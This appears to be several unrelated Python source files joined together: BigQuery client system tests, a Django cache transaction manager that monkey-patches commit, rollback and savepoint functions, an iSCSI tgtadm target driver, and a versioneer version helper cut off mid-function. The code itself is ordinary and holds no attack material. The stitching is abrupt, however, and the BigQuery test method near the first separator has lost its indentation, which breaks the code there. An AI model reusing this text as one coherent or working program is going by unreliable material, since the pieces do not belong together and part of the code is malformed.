            writer.writerow(('Full Name', 'Age'))
            writer.writerows(ROWS)
            blob.upload_from_file(
                csv_file, rewind=True, content_type='text/csv')
        # Blobs/tables must be deleted before their containing resources.
        self.to_delete.insert(0, blob)
        dataset = Config.CLIENT.dataset(
            _make_dataset_name('load_gcs_then_dump'))
        retry_403(dataset.create)()
        self.to_delete.append(dataset)
        full_name = bigquery.SchemaField('full_name', 'STRING',
                                         mode='REQUIRED')
        age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
        table = dataset.table(TABLE_NAME, schema=[full_name, age])
        table.create()
        self.to_delete.insert(0, table)
        job = Config.CLIENT.load_table_from_storage(
            'bq_load_storage_test_' + local_id, table, GS_URL)
        job.create_disposition = 'CREATE_NEVER'
        job.skip_leading_rows = 1
        job.source_format = 'CSV'
        job.write_disposition = 'WRITE_EMPTY'
        job.begin()
        def _job_done(instance):
            return instance.state in ('DONE', 'done')
        # Allow for "warm up" before the load job finishes.  See:
        # https://cloud.google.com/bigquery/streaming-data-into-bigquery#dataavailability
        # 8 tries -> 1 + 2 + 4 + 8 + 16 + 32 + 64 = 127 seconds
        retry = RetryInstanceState(_job_done, max_tries=8)
        retry(job.reload)()
        rows = self._fetch_single_page(table)
        by_age = operator.itemgetter(1)
        self.assertEqual(sorted(rows, key=by_age),
                         sorted(ROWS, key=by_age))
    def test_job_cancel(self):
        """Start an async query job, cancel it, and wait for completion."""
        DATASET_NAME = _make_dataset_name('job_cancel')
        JOB_NAME = 'fetch_' + DATASET_NAME
        TABLE_NAME = 'test_table'
        QUERY = 'SELECT * FROM %s.%s' % (DATASET_NAME, TABLE_NAME)
        dataset = Config.CLIENT.dataset(DATASET_NAME)
        retry_403(dataset.create)()
        self.to_delete.append(dataset)
        full_name = bigquery.SchemaField('full_name', 'STRING',
                                         mode='REQUIRED')
        age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
        table = dataset.table(TABLE_NAME, schema=[full_name, age])
        table.create()
        # Tables must be deleted before their parent dataset.
        self.to_delete.insert(0, table)
        job = Config.CLIENT.run_async_query(JOB_NAME, QUERY)
        job.begin()
        job.cancel()
        def _job_done(instance):
            return instance.state in ('DONE', 'done')
        retry = RetryInstanceState(_job_done, max_tries=8)
        retry(job.reload)()
        # The `cancel` API doesn't leave any reliable traces on
        # the status of the job resource, so we can't really assert for
        # them here.  The best we can do is note that the API call didn't
        # raise an error, and that the job completed (in the `retry()`
        # above).
    def test_sync_query_w_standard_sql_types(self):
        """Round-trip each standard-SQL scalar and composite type.

        Every example is a single-row, single-column query paired with
        the Python value the client is expected to produce for it.
        """
        import datetime
        from google.cloud._helpers import UTC
        naive = datetime.datetime(2016, 12, 5, 12, 41, 9)
        stamp = "%s %s" % (naive.date().isoformat(), naive.time().isoformat())
        zoned = naive.replace(tzinfo=UTC)
        EXAMPLES = [
            {
                'sql': 'SELECT 1',
                'expected': 1,
            },
            {
                'sql': 'SELECT 1.3',
                'expected': 1.3,
            },
            {
                'sql': 'SELECT TRUE',
                'expected': True,
            },
            {
                'sql': 'SELECT "ABC"',
                'expected': 'ABC',
            },
            {
                'sql': 'SELECT CAST("foo" AS BYTES)',
                'expected': b'foo',
            },
            {
                'sql': 'SELECT TIMESTAMP "%s"' % (stamp,),
                'expected': zoned,
            },
            {
                'sql': 'SELECT DATETIME(TIMESTAMP "%s")' % (stamp,),
                'expected': naive,
            },
            {
                'sql': 'SELECT DATE(TIMESTAMP "%s")' % (stamp,),
                'expected': naive.date(),
            },
            {
                'sql': 'SELECT TIME(TIMESTAMP "%s")' % (stamp,),
                'expected': naive.time(),
            },
            # Anonymous STRUCT fields come back keyed as _field_N.
            {
                'sql': 'SELECT (1, 2)',
                'expected': {'_field_1': 1, '_field_2': 2},
            },
            {
                'sql': 'SELECT [1, 2, 3]',
                'expected': [1, 2, 3],
            },
            {
                'sql': 'SELECT ([1, 2], 3, [4, 5])',
                'expected':
                    {'_field_1': [1, 2], '_field_2': 3, '_field_3': [4, 5]},
            },
            {
                'sql': 'SELECT [(1, 2, 3), (4, 5, 6)]',
                'expected': [
                    {'_field_1': 1, '_field_2': 2, '_field_3': 3},
                    {'_field_1': 4, '_field_2': 5, '_field_3': 6},
                ],
            },
            {
                'sql': 'SELECT [([1, 2, 3], 4), ([5, 6], 7)]',
                'expected': [
                    {u'_field_1': [1, 2, 3], u'_field_2': 4},
                    {u'_field_1': [5, 6], u'_field_2': 7},
                ],
            },
            {
                'sql': 'SELECT ARRAY(SELECT STRUCT([1, 2]))',
                'expected': [{u'_field_1': [1, 2]}],
            },
        ]
        for example in EXAMPLES:
            query = Config.CLIENT.run_sync_query(example['sql'])
            # These constructs require standard SQL, not legacy SQL.
            query.use_legacy_sql = False
            query.run()
            self.assertEqual(len(query.rows), 1)
            self.assertEqual(len(query.rows[0]), 1)
            self.assertEqual(query.rows[0][0], example['expected'])
def test_dump_table_w_public_data(self):
PUBLIC = 'bigquery-public-data'
DATASET_NAME = 'samples'
TABLE_NAME = 'natality'
dataset = Config.CLIENT.dataset(DATASET_NAME, project=PUBLIC)
table = dataset.table(TABLE_NAME)
self._fetch_single_page(table)
| |
import django
from django.db import transaction as django_transaction
from django.db import connection
try:
    from django.db import DEFAULT_DB_ALIAS
except ImportError:
    # Pre-multi-db Django does not define DEFAULT_DB_ALIAS; fall back to
    # None so `using` lookups still have a sentinel value.
    # Fixes: the fallback previously assigned a misspelled name
    # (DEFUALT_DB_ALIAS), leaving DEFAULT_DB_ALIAS undefined and causing a
    # NameError later; also narrows the bare `except:` to ImportError.
    DEFAULT_DB_ALIAS = None
from johnny.decorators import wraps, available_attrs
class TransactionManager(object):
    """
    TransactionManager is a wrapper around a cache_backend that is
    transaction aware.
    If we are in a transaction, it will return the locally cached version.
    * On rollback, it will flush all local caches
    * On commit, it will push them up to the real shared cache backend
    (ex. memcached).
    """
    # True while django.db.transaction commit/rollback/savepoint functions
    # are monkey-patched by patch().
    _patched_var = False
    def __init__(self, cache_backend, keygen):
        # Deferred import avoids a circular import at module load time.
        from johnny import cache, settings
        self.timeout = settings.MIDDLEWARE_SECONDS
        self.prefix = settings.MIDDLEWARE_KEY_PREFIX
        self.cache_backend = cache_backend
        # Thread-local store holding dirty keys and savepoint snapshots.
        self.local = cache.local
        self.keygen = keygen(self.prefix)
        # Original (pre-patch) transaction functions, filled by patch().
        self._originals = {}
        self._dirty_backup = {}
        # Map of db alias -> stack of active savepoint keys.
        self.local['trans_sids'] = {}
    def _get_sid(self, using=None):
        """Return (creating if needed) the savepoint stack for ``using``."""
        if 'trans_sids' not in self.local:
            self.local['trans_sids'] = {}
        d = self.local['trans_sids']
        if using is None:
            using = DEFAULT_DB_ALIAS
        if using not in d:
            d[using] = []
        return d[using]
    def _clear_sid_stack(self, using=None):
        """Drop savepoint state once a transaction has fully ended."""
        if using is None:
            using = DEFAULT_DB_ALIAS
        # NOTE(review): this deletes the whole 'trans_sids' mapping (stacks
        # for ALL db aliases), not just the entry for ``using`` -- confirm
        # this is intended before relying on multi-db savepoint isolation.
        if using in self.local.get('trans_sids', {}):
            del self.local['trans_sids']
    def is_managed(self, using=None):
        """Proxy to django's is_managed; pre-1.2 lacks the ``using`` arg."""
        # NOTE(review): assumes Django 1.x -- VERSION[1] comparison breaks
        # on 2.0+.
        if django.VERSION[1] < 2:
            return django_transaction.is_managed()
        return django_transaction.is_managed(using=using)
    def get(self, key, default=None, using=None):
        """Read ``key``, preferring transaction-local values when managed."""
        if self.is_managed(using) and self._patched_var:
            val = self.local.get(key, None)
            if val:
                return val
            # Fall back to values captured in enclosing savepoints.
            if self._uses_savepoints():
                val = self._get_from_savepoints(key, using)
                if val:
                    return val
        return self.cache_backend.get(key, default)
    def _get_from_savepoints(self, key, using=None):
        """Search the savepoint stack (innermost first) for ``key``."""
        sids = self._get_sid(using)
        cp = list(sids)
        cp.reverse()
        for sid in cp:
            if key in self.local[sid]:
                return self.local[sid][key]
    def _trunc_using(self, using):
        """Shorten very long db aliases so generated keys stay bounded."""
        if using is None:
            using = DEFAULT_DB_ALIAS
        # Keep a readable prefix and hash the remainder.
        if len(using) > 100:
            using = using[0:68] + self.keygen.gen_key(using[68:])
        return using
    def set(self, key, val, timeout=None, using=None):
        """
        Set will be using the generational key, so if another thread
        bumps this key, the localstore version will still be invalid.
        If the key is bumped during a transaction it will be new
        to the global cache on commit, so it will still be a bump.
        """
        if timeout is None:
            timeout = self.timeout
        if self.is_managed(using=using) and self._patched_var:
            self.local[key] = val
        else:
            self.cache_backend.set(key, val, timeout)
    def _clear(self, using=None):
        """Discard all transaction-local dirty keys for ``using``."""
        self.local.clear('%s_%s_*' %
                         (self.prefix, self._trunc_using(using)))
    def _flush(self, commit=True, using=None):
        """
        Flushes the internal cache, either to the memcache or rolls back
        """
        if commit:
            # XXX: multi-set?
            if self._uses_savepoints():
                self._commit_all_savepoints(using)
            # Push every locally-dirty key up to the shared backend.
            c = self.local.mget('%s_%s_*' %
                                (self.prefix, self._trunc_using(using)))
            for key, value in c.iteritems():
                self.cache_backend.set(key, value, self.timeout)
        else:
            if self._uses_savepoints():
                self._rollback_all_savepoints(using)
        self._clear(using)
        self._clear_sid_stack(using)
    def _patched(self, original, commit=True):
        """Wrap commit/rollback so the local cache is flushed afterwards."""
        @wraps(original, assigned=available_attrs(original))
        def newfun(using=None):
            #1.2 version
            original(using=using)
            self._flush(commit=commit, using=using)
        return newfun
    def _uses_savepoints(self):
        """Whether the active database backend supports savepoints."""
        return connection.features.uses_savepoints
    def _sid_key(self, sid, using=None):
        """Namespace a savepoint id into a localstore key (idempotent)."""
        if using is not None:
            prefix = 'trans_savepoint_%s' % using
        else:
            prefix = 'trans_savepoint'
        # Already-namespaced ids are passed through unchanged.
        if sid is not None and sid.startswith(prefix):
            return sid
        return '%s_%s'%(prefix, sid)
    def _create_savepoint(self, sid, using=None):
        """Snapshot current dirty keys under ``sid``, then start clean."""
        key = self._sid_key(sid, using)
        #get all local dirty items
        c = self.local.mget('%s_%s_*' %
                            (self.prefix, self._trunc_using(using)))
        #store them to a dictionary in the localstore
        if key not in self.local:
            self.local[key] = {}
        for k, v in c.iteritems():
            self.local[key][k] = v
        #clear the dirty
        self._clear(using)
        #append the key to the savepoint stack
        sids = self._get_sid(using)
        sids.append(key)
    def _rollback_savepoint(self, sid, using=None):
        """Discard ``sid`` and every savepoint created after it."""
        sids = self._get_sid(using)
        key = self._sid_key(sid, using)
        stack = []
        try:
            popped = None
            while popped != key:
                popped = sids.pop()
                stack.insert(0, popped)
            #delete items from localstore
            for i in stack:
                del self.local[i]
            #clear dirty
            self._clear(using)
        except IndexError:
            #key not found, don't delete from localstore, restore sid stack
            for i in stack:
                sids.insert(0, i)
    def _commit_savepoint(self, sid, using=None):
        # commit is not a commit but is in reality just a clear back to that
        # savepoint and adds the items back to the dirty transaction.
        key = self._sid_key(sid, using)
        sids = self._get_sid(using)
        stack = []
        try:
            popped = None
            while popped != key:
                popped = sids.pop()
                stack.insert(0, popped)
            # Park the current dirty set, replay each committed savepoint's
            # snapshot into the localstore, then merge the dirty set back.
            self._store_dirty(using)
            for i in stack:
                for k, v in self.local[i].iteritems():
                    self.local[k] = v
                del self.local[i]
            self._restore_dirty(using)
        except IndexError:
            # Key not found: restore the savepoint stack untouched.
            for i in stack:
                sids.insert(0, i)
    def _commit_all_savepoints(self, using=None):
        """Fold every outstanding savepoint back into the dirty set."""
        sids = self._get_sid(using)
        if sids:
            self._commit_savepoint(sids[0], using)
    def _rollback_all_savepoints(self, using=None):
        """Throw away every outstanding savepoint."""
        sids = self._get_sid(using)
        if sids:
            self._rollback_savepoint(sids[0], using)
    def _store_dirty(self, using=None):
        """Move current dirty keys aside into a temporary backup slot."""
        c = self.local.mget('%s_%s_*' %
                            (self.prefix, self._trunc_using(using)))
        backup = 'trans_dirty_store_%s' % self._trunc_using(using)
        self.local[backup] = {}
        for k, v in c.iteritems():
            self.local[backup][k] = v
        self._clear(using)
    def _restore_dirty(self, using=None):
        """Merge the backup slot created by _store_dirty back in."""
        backup = 'trans_dirty_store_%s' % self._trunc_using(using)
        for k, v in self.local.get(backup, {}).iteritems():
            self.local[k] = v
        del self.local[backup]
    def _savepoint(self, original):
        """Wrap savepoint() so local state is snapshotted with the db's."""
        @wraps(original, assigned=available_attrs(original))
        def newfun(using=None):
            if using != None:
                sid = original(using=using)
            else:
                sid = original()
            if self._uses_savepoints():
                self._create_savepoint(sid, using)
            return sid
        return newfun
    def _savepoint_rollback(self, original):
        """Wrap savepoint_rollback() to also roll back local cache state."""
        def newfun(sid, *args, **kwargs):
            original(sid, *args, **kwargs)
            if self._uses_savepoints():
                # ``using`` may arrive positionally or as a keyword.
                if len(args) == 2:
                    using = args[1]
                else:
                    using = kwargs.get('using', None)
                self._rollback_savepoint(sid, using)
        return newfun
    def _savepoint_commit(self, original):
        """Wrap savepoint_commit() to also commit local cache state."""
        def newfun(sid, *args, **kwargs):
            original(sid, *args, **kwargs)
            if self._uses_savepoints():
                # ``using`` may arrive positionally or as a keyword.
                if len(args) == 1:
                    using = args[0]
                else:
                    using = kwargs.get('using', None)
                self._commit_savepoint(sid, using)
        return newfun
    def _getreal(self, name):
        """Return the original function, even if patching already ran."""
        # Prefer a previously-saved 'real_<name>' attribute when present.
        return getattr(django_transaction, 'real_%s' % name,
                       getattr(django_transaction, name))
    def patch(self):
        """
        This function monkey patches commit and rollback
        writes to the cache should not happen until commit (unless our state
        isn't managed). It does not yet support savepoints.
        """
        if not self._patched_var:
            # Save the originals so unpatch() can restore them.
            self._originals['rollback'] = self._getreal('rollback')
            self._originals['commit'] = self._getreal('commit')
            self._originals['savepoint'] = self._getreal('savepoint')
            self._originals['savepoint_rollback'] = self._getreal('savepoint_rollback')
            self._originals['savepoint_commit'] = self._getreal('savepoint_commit')
            django_transaction.rollback = self._patched(django_transaction.rollback, False)
            django_transaction.commit = self._patched(django_transaction.commit, True)
            django_transaction.savepoint = self._savepoint(django_transaction.savepoint)
            django_transaction.savepoint_rollback = self._savepoint_rollback(django_transaction.savepoint_rollback)
            django_transaction.savepoint_commit = self._savepoint_commit(django_transaction.savepoint_commit)
            self._patched_var = True
    def unpatch(self):
        """Restore the original transaction functions saved by patch()."""
        for fun in self._originals:
            setattr(django_transaction, fun, self._originals[fun])
        self._patched_var = False
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import textwrap
import time
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from oslo_utils import fileutils
from jacket.storage import exception
from jacket.storage.i18n import _LI, _LW, _LE
from jacket.storage import utils
from jacket.storage.volume.targets import iscsi
LOG = logging.getLogger(__name__)
class TgtAdm(iscsi.ISCSITarget):
    """Target object for block storage devices.
    Base class for target object, where target
    is data transport mechanism (target) specific calls.
    This includes things like create targets, attach, detach
    etc.
    """
    # Template for the per-volume tgtd persistence file; filled with
    # %-mapping keys in create_iscsi_target().
    VOLUME_CONF = textwrap.dedent("""
                <target %(name)s>
                    backing-store %(path)s
                    driver %(driver)s
                    %(chap_auth)s
                    %(target_flags)s
                    write-cache %(write_cache)s
                </target>
                  """)
    def __init__(self, *args, **kwargs):
        super(TgtAdm, self).__init__(*args, **kwargs)
    def _get_target(self, iqn):
        """Return the tgtd target id (tid) for ``iqn``, or None."""
        (out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
        lines = out.split('\n')
        for line in lines:
            if iqn in line:
                # Line looks like "Target <tid>: <iqn>"; strip the colon.
                parsed = line.split()
                tid = parsed[1]
                return tid[:-1]
        return None
    def _verify_backing_lun(self, iqn, tid):
        """Check that the data LUN (LUN 1) exists for the given target."""
        backing_lun = True
        capture = False
        target_info = []
        (out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
        lines = out.split('\n')
        # Capture only the lines belonging to this target's section.
        for line in lines:
            if iqn in line and "Target %s" % tid in line:
                capture = True
            if capture:
                target_info.append(line)
            if iqn not in line and 'Target ' in line:
                capture = False
        # NOTE(review): this is a list-membership test, so it requires an
        # output line exactly equal to ' LUN: 1' (including leading
        # whitespace) -- confirm against actual tgt-admin output formatting.
        if ' LUN: 1' not in target_info:
            backing_lun = False
        return backing_lun
    def _recreate_backing_lun(self, iqn, tid, name, path):
        """Best-effort re-creation of LUN 1 after a failed target create."""
        LOG.warning(_LW('Attempting recreate of backing lun...'))
        # Since we think the most common case of this is a dev busy
        # (create vol from snapshot) we're going to add a sleep here
        # this will hopefully give things enough time to stabilize
        # how long should we wait??  I have no idea, let's go big
        # and error on the side of caution
        time.sleep(10)
        (out, err) = (None, None)
        try:
            (out, err) = utils.execute('tgtadm', '--lld', 'iscsi',
                                       '--op', 'new', '--mode',
                                       'logicalunit', '--tid',
                                       tid, '--lun', '1', '-b',
                                       path, run_as_root=True)
        except putils.ProcessExecutionError as e:
            LOG.error(_LE("Failed recovery attempt to create "
                          "iscsi backing lun for Volume "
                          "ID:%(vol_id)s: %(e)s"),
                      {'vol_id': name, 'e': e})
        finally:
            LOG.debug('StdOut from recreate backing lun: %s', out)
            LOG.debug('StdErr from recreate backing lun: %s', err)
    def _get_iscsi_target(self, context, vol_id):
        """Unused by tgtadm; kept for interface compatibility."""
        return 0
    def _get_target_and_lun(self, context, volume):
        """Return the (target, lun) pair used by the tgtadm helper."""
        lun = 1  # For tgtadm the controller is lun 0, dev starts at lun 1
        iscsi_target = 0  # NOTE(jdg): Not used by tgtadm
        return iscsi_target, lun
    @utils.retry(putils.ProcessExecutionError)
    def _do_tgt_update(self, name):
        """Run 'tgt-admin --update' for ``name``, retrying on failure."""
        (out, err) = utils.execute('tgt-admin', '--update', name,
                                   run_as_root=True)
        LOG.debug("StdOut from tgt-admin --update: %s", out)
        LOG.debug("StdErr from tgt-admin --update: %s", err)
    def create_iscsi_target(self, name, tid, lun, path,
                            chap_auth=None, **kwargs):
        """Create (and verify) a tgtd target backed by ``path``.

        Writes a persistence file for the volume, asks tgt-admin to
        create the target from it, then verifies the target and its
        backing LUN exist, attempting one recovery if the LUN is missing.
        Returns the created target id.
        """
        # Note(jdg) tid and lun aren't used by TgtAdm but remain for
        # compatibility
        # NOTE(jdg): Remove this when we get to the bottom of bug: #1398078
        # for now, since we intermittently hit target already exists we're
        # adding some debug info to try and pinpoint what's going on
        (out, err) = utils.execute('tgtadm',
                                   '--lld',
                                   'iscsi',
                                   '--op',
                                   'show',
                                   '--mode',
                                   'target',
                                   run_as_root=True)
        LOG.debug("Targets prior to update: %s", out)
        fileutils.ensure_tree(self.volumes_dir)
        vol_id = name.split(':')[1]
        write_cache = self.configuration.get('iscsi_write_cache', 'on')
        driver = self.iscsi_protocol
        chap_str = ''
        if chap_auth is not None:
            chap_str = 'incominguser %s %s' % chap_auth
        target_flags = self.configuration.get('iscsi_target_flags', '')
        if target_flags:
            target_flags = 'bsoflags ' + target_flags
        volume_conf = self.VOLUME_CONF % {
            'name': name, 'path': path, 'driver': driver,
            'chap_auth': chap_str, 'target_flags': target_flags,
            'write_cache': write_cache}
        LOG.debug('Creating iscsi_target for Volume ID: %s', vol_id)
        volumes_dir = self.volumes_dir
        volume_path = os.path.join(volumes_dir, vol_id)
        if os.path.exists(volume_path):
            LOG.warning(_LW('Persistence file already exists for volume, '
                            'found file at: %s'), volume_path)
        utils.robust_file_write(volumes_dir, vol_id, volume_conf)
        LOG.debug(('Created volume path %(vp)s,\n'
                   'content: %(vc)s'),
                  {'vp': volume_path, 'vc': volume_conf})
        old_persist_file = None
        old_name = kwargs.get('old_name', None)
        if old_name is not None:
            # Fix: the format string previously used '%{vol}s'/'%{old_name}s',
            # which is invalid %-mapping syntax and raised ValueError when
            # the debug record was rendered.
            LOG.debug('Detected old persistence file for volume '
                      '%(vol)s at %(old_name)s',
                      {'vol': vol_id, 'old_name': old_name})
            old_persist_file = os.path.join(volumes_dir, old_name)
        try:
            # With the persistent tgts we create them
            # by creating the entry in the persist file
            # and then doing an update to get the target
            # created.
            self._do_tgt_update(name)
        except putils.ProcessExecutionError as e:
            if "target already exists" in e.stderr:
                # Adding the additional Warning message below for a clear
                # ER marker (Ref bug: #1398078).
                LOG.warning(_LW('Could not create target because '
                                'it already exists for volume: %s'), vol_id)
                LOG.debug('Exception was: %s', e)
            else:
                LOG.error(_LE("Failed to create iscsi target for Volume "
                              "ID: %(vol_id)s: %(e)s"),
                          {'vol_id': vol_id, 'e': e})
                # Don't forget to remove the persistent file we created
                os.unlink(volume_path)
                raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
        # Grab targets list for debug
        # Consider adding a check for lun 0 and 1 for tgtadm
        # before considering this as valid
        (out, err) = utils.execute('tgtadm',
                                   '--lld',
                                   'iscsi',
                                   '--op',
                                   'show',
                                   '--mode',
                                   'target',
                                   run_as_root=True)
        LOG.debug("Targets after update: %s", out)
        iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
        tid = self._get_target(iqn)
        if tid is None:
            LOG.error(_LE("Failed to create iscsi target for Volume "
                          "ID: %(vol_id)s. Please ensure your tgtd config "
                          "file contains 'include %(volumes_dir)s/*'"), {
                      'vol_id': vol_id,
                      'volumes_dir': volumes_dir, })
            raise exception.NotFound()
        # NOTE(jdg): Sometimes we have some issues with the backing lun
        # not being created, believe this is due to a device busy
        # or something related, so we're going to add some code
        # here that verifies the backing lun (lun 1) was created
        # and we'll try and recreate it if it's not there
        if not self._verify_backing_lun(iqn, tid):
            try:
                self._recreate_backing_lun(iqn, tid, name, path)
            except putils.ProcessExecutionError:
                os.unlink(volume_path)
                raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
            # Finally check once more and if no go, fail and punt
            if not self._verify_backing_lun(iqn, tid):
                os.unlink(volume_path)
                raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
        if old_persist_file is not None and os.path.exists(old_persist_file):
            os.unlink(old_persist_file)
        return tid
    def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
        """Delete the tgtd target for a volume and its persistence file.

        Retries without --force when tgt fails silently, and tolerates
        already-removed targets/ACLs.
        """
        LOG.info(_LI('Removing iscsi_target for Volume ID: %s'), vol_id)
        vol_uuid_file = vol_name
        volume_path = os.path.join(self.volumes_dir, vol_uuid_file)
        if not os.path.exists(volume_path):
            LOG.warning(_LW('Volume path %s does not exist, '
                            'nothing to remove.'), volume_path)
            return
        if os.path.isfile(volume_path):
            iqn = '%s%s' % (self.iscsi_target_prefix,
                            vol_uuid_file)
        else:
            raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
        try:
            # NOTE(vish): --force is a workaround for bug:
            #             https://bugs.launchpad.net/storage/+bug/1159948
            utils.execute('tgt-admin',
                          '--force',
                          '--delete',
                          iqn,
                          run_as_root=True)
        except putils.ProcessExecutionError as e:
            non_fatal_errors = ("can't find the target",
                                "access control rule does not exist")
            if any(error in e.stderr for error in non_fatal_errors):
                LOG.warning(_LW("Failed target removal because target or "
                                "ACL's couldn't be found for iqn: %s."), iqn)
            else:
                LOG.error(_LE("Failed to remove iscsi target for Volume "
                              "ID: %(vol_id)s: %(e)s"),
                          {'vol_id': vol_id, 'e': e})
                raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
        # NOTE(jdg): There's a bug in some versions of tgt that
        # will sometimes fail silently when using the force flag
        #    https://bugs.launchpad.net/ubuntu/+source/tgt/+bug/1305343
        # For now work-around by checking if the target was deleted,
        # if it wasn't, try again without the force.
        # This will NOT do any good for the case of mutliple sessions
        # which the force was aded for but it will however address
        # the cases pointed out in bug:
        #    https://bugs.launchpad.net/storage/+bug/1304122
        if self._get_target(iqn):
            try:
                LOG.warning(_LW('Silent failure of target removal '
                                'detected, retry....'))
                utils.execute('tgt-admin',
                              '--delete',
                              iqn,
                              run_as_root=True)
            except putils.ProcessExecutionError as e:
                LOG.error(_LE("Failed to remove iscsi target for Volume "
                              "ID: %(vol_id)s: %(e)s"),
                          {'vol_id': vol_id, 'e': e})
                raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
        # NOTE(jdg): This *should* be there still but incase
        # it's not we don't care, so just ignore it if was
        # somehow deleted between entry of this method
        # and here
        if os.path.exists(volume_path):
            os.unlink(volume_path)
        else:
            LOG.debug('Volume path %s not found at end, '
                      'of remove_iscsi_target.', volume_path)
| |
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
    """Get the keywords needed to look up the version information."""
    # git-archive substitutes these placeholders at export time.
    # versioneer/setup.py grep for the variable names, so each assignment
    # must stay on its own line; _version.py simply calls get_keywords().
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    git_date = "$Format:%ci$"
    return {"refnames": git_refnames, "full": git_full, "date": git_date}
class VersioneerConfig:
    """Plain attribute container for Versioneer configuration parameters."""
def get_config():
    """Create, populate and return the VersioneerConfig() object."""
    # These values are baked in when 'setup.py versioneer' generates
    # _version.py for this project.
    settings = {
        "VCS": "git",
        "style": "pep440",
        "tag_prefix": "v",
        "parentdir_prefix": "threeML-",
        "versionfile_source": "threeML/_version.py",
        "verbose": False,
    }
    cfg = VersioneerConfig()
    for attr, value in settings.items():
        setattr(cfg, attr, value)
    return cfg
class NotThisMethod(Exception):
    """Raised when a given version-discovery strategy does not apply."""
# Registry of embedded long-form _version.py templates, keyed by VCS.
LONG_VERSION_PY = {}
# Two-level registry: HANDLERS[vcs][method] -> handler function.
HANDLERS = {}


def register_vcs_handler(vcs, method):  # decorator
    """Create decorator to mark a method as the handler of a VCS."""
    def decorate(f):
        """Store f in HANDLERS[vcs][method] and return it unchanged."""
        HANDLERS.setdefault(vcs, {})[method] = f
        return f
    return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
    """Call the given command(s)."""
    assert isinstance(commands, list)
    process = None
    for candidate in commands:
        dispcmd = str([candidate] + args)
        try:
            # remember shell=False, so use git.cmd on windows, not just git
            process = subprocess.Popen(
                [candidate] + args,
                cwd=cwd,
                env=env,
                stdout=subprocess.PIPE,
                stderr=(subprocess.PIPE if hide_stderr else None),
            )
        except EnvironmentError:
            err = sys.exc_info()[1]
            if err.errno == errno.ENOENT:
                # Executable not found: fall through to the next candidate.
                continue
            if verbose:
                print("unable to run %s" % dispcmd)
                print(err)
            return None, None
        break
    else:
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None, None
    stdout = process.communicate()[0].strip()
    if sys.version_info[0] >= 3:
        stdout = stdout.decode()
    if process.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % dispcmd)
            print("stdout was %s" % stdout)
        return None, process.returncode
    return stdout, process.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Try to determine the version from the parent directory name.

    Source tarballs conventionally unpack into a directory that includes both
    the project name and a version string. We will also support searching up
    two directory levels for an appropriately named parent directory
    """
    tried = []
    for _ in range(3):
        dirname = os.path.basename(root)
        if dirname.startswith(parentdir_prefix):
            # Everything after the prefix is the version string.
            return {
                "version": dirname[len(parentdir_prefix):],
                "full-revisionid": None,
                "dirty": False,
                "error": None,
                "date": None,
            }
        tried.append(root)
        root = os.path.dirname(root)  # walk one level up
    if verbose:
        print(
            "Tried directories %s but none started with prefix %s"
            % (str(tried), parentdir_prefix)
        )
    raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
    """Extract version information from the given file."""
    # The code embedded in _version.py can simply read these keyword
    # variables at runtime.  When used from setup.py we must not import
    # _version.py, so we scrape the assignments with a regexp instead.
    # This function is not used from _version.py itself.
    keywords = {}
    markers = {
        "git_refnames =": "refnames",
        "git_full =": "full",
        "git_date =": "date",
    }
    try:
        f = open(versionfile_abs, "r")
        for line in f.readlines():
            stripped = line.strip()
            for marker, key in markers.items():
                if stripped.startswith(marker):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords[key] = mo.group(1)
        f.close()
    except EnvironmentError:
        # Missing/unreadable file: return whatever was gathered (nothing).
        pass
    return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
    """Get version information from git keywords.

    Raises NotThisMethod if the keywords are absent or unexpanded
    (i.e. we are not inside a git-archive tarball).
    """
    if not keywords:
        raise NotThisMethod("no keywords at all, weird")
    date = keywords.get("date")
    if date is not None:
        # git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
        # datestamp. However we prefer "%ci" (which expands to an "ISO-8601
        # -like" string, which we must then edit to make compliant), because
        # it's been around since git-1.5.3, and it's too difficult to
        # discover which version we're using, or to work around using an
        # older one.
        date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
    refnames = keywords["refnames"].strip()
    if refnames.startswith("$Format"):
        # Placeholder was never substituted: not a git-archive tarball.
        if verbose:
            print("keywords are unexpanded, not using")
        raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
    refs = set([r.strip() for r in refnames.strip("()").split(",")])
    # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
    # just "foo-1.0". If we see a "tag: " prefix, prefer those.
    TAG = "tag: "
    tags = set([r[len(TAG) :] for r in refs if r.startswith(TAG)])
    if not tags:
